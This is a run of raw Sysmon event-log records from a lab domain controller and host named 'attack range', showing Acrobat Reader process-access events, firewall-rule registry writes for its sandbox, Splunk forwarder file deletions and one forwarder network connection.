DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.313{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6 10341000x800000000000000046602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.313{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 13241300x800000000000000046601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:03.311{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934S-1-5-21-3390194966-3619762420-607771929-500v2.26|AppPkgId=S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934|LUOwn=S-1-5-21-3390194966-3619762420-607771929-500|M=adobe.acrobatreaderdc.protectedmode|Name=Adobe Acrobat Reader Protected Mode|Desc=Sandbox container for Acrobat Reader Protected Mode| 10341000x800000000000000046600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.311{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000046599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:03.311{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000de6) 10341000x800000000000000046598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.311{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.311{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1ce67f(wow64)|C:\Windows\System32\windows.storage.dll+1b8ec8(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 13241300x800000000000000046596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:03.311{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CB52094A-F8F1-4F36-80FA-32FE10584FD4}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=Adobe Acrobat Reader Protected Mode|Desc=Sandbox container for Acrobat Reader Protected Mode|LUOwn=S-1-5-21-3390194966-3619762420-607771929-500|AppPkgId=S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934|EmbedCtxt=Adobe Acrobat Reader Protected Mode| 10341000x800000000000000046595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.310{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1ce671(wow64)|C:\Windows\System32\windows.storage.dll+1b8ec8(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.310{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1ce671(wow64)|C:\Windows\System32\windows.storage.dll+1b8ec8(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 13241300x800000000000000046593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:03.310{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000de5) 13241300x800000000000000046592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:03.310{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{94835B5D-C498-4DD3-8B0B-13DCE73DD143}v2.26|Action=Block|Active=TRUE|Dir=In|Name=Adobe Acrobat Reader Protected Mode|Desc=Sandbox container for Acrobat Reader Protected Mode|LUOwn=S-1-5-21-3390194966-3619762420-607771929-500|AppPkgId=S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934|EmbedCtxt=Adobe Acrobat Reader Protected Mode| 10341000x800000000000000046591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.294{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.255{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.255{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.255{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000046587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.146{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80054AC3CC89B2CE7B4A109FFFC3901D,SHA256=D6409EB76248B6E2B3E26D08FCB6E2EF9F7BAB3D9A3EB7092C78B25E0A3D5F75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.067{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD598D85A903D68275BB04ABE9FFA442,SHA256=52E47249C96153EF94BAA654846E752BD9FB1DE2659EED971499811A3F3D98E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018711Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.908{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50190-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018710Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:04.634{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEFFB1DADA69CA0FA224C335047A77DA,SHA256=AF9F68718A30E095E0C5D1D1851FE7FD0EC554BDB827005B560B98D7D1C7FEAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.920{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.920{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.641{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.641{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:04.641{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 